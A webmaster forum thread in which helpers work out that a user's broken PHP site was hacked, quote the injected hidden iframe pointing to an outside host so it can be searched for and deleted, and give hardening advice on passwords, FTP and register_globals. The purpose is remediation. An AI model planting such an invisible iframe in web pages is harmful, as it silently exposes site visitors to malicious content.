Oooops! PHP help needed please (I think)

pm sent.

Karuna

Sandy,
The error is a parse error also referred to as a runtime error. On line 256 of the code for your index page you're probably missing a semi-colon ; at the end of the line. PHP requires that the end of each line of code end in a semi-colon. You may also be missing a " or a }.

If line 256 is the last line of code on the page, or the end of a function then you're probably missing the ending bracket }.

Whichever it is you need to find line 256 in the code. And see if it is properly formed. Remember when counting the lines in the code you must also count any white space in the code created by a carriage return. Using an editor that counts your lines for you and highlights different parts of the code would make your life easier.

You will find a free editor that you can download using this link to PSPad This editor is free and powerful enough to do anything a beginner with PHP may need. There are a number of free editors that you could use if you don't like that one. FirstPage 2000 or PHPDeveloper come to mind.

Anyway, fixing this problem is a relatively simple task. Just have a little patience when looking for the problem.

If you can't find it. PM me and I'll see if I can help you out.

Good Luck,
Gene

Send me a pm if you still need help with this. I'll fix it for free.

Apparently, last week was some idiot hacker's attempt to mess up a bunch of sites. I just had somebody else that I support have this problem, and this didn't even occur to me until looking at this post again.

Download all of your files to a new folder for backup purposes... You don't want to overwrite any existing "good" files that you may have. In that backup folder, you're going to want to do a search in every single file for "<iframe src="http://lotultimatebet.cn/in.cgi?income59" width=1 height=1 style="visibility: hidden"></iframe> ". Delete that line from all of your files and then re-upload them.

That'll fix it. I know that dreamweaver will do a folder level find/replace, but I think that Typepad may also do it. Typepad is a free program, so you might try that first if you don't have anything else that does it.

Sandy, you definitely had some code "injected" into your site somehow, it's been happening to a lot of people over the past couple weeks. If you still have the original index.php (you should, it's the index.php that comes with the $7 script) just upload a fresh copy and overwrite the one that's on the server.

Make sure you change all of your passwords for FTP and cpanel too just to make it a little harder for someone to do something like this to you again.

Also, check with your web host and verify that they've closed a few things that could be security holes.. here's a few examples

Anonymous FTP should be disabled, there's no need for it and depending on how the server is set up sometimes hackers can get in that way and do bad things.

PHP's REGISTER_GLOBALS setting should be disabled. It's been known for years to be a major security hole but a lot of hosts still leave it enabled anyway because some older scripts still require it (personally I think if a script requires it, it needs to be rewritten because it probably has other security holes too).

If your host supports SFTP or SCP for transferring your files to the server, start using that and ditch standard FTP completely. FTP is not a secure protocol, your password is always sent to the server "in the clear" and it's not hard for a hacker to packet sniff your connection and get your login info. SFTP and SCP use encryption so they're a lot safer. Most cpanel based hosts support SFTP, and most FTP programs support it too, it's usually just a matter of changing one setting in your FTP program (and since I don't have a mac I wouldn't be able to tell you what to change, sorry).

You should still go through the rest of the files on the server and check for that little piece of code, but at least this gets your site back up and running for now while you're dealing with any other files that might have been corrupted.

If you haven't made any changes since the last time you uploaded files, then you can just replace all code on the server with your good code. I would recommend making a backup of all pages on the server, though, just in case something is accidentally overwritten.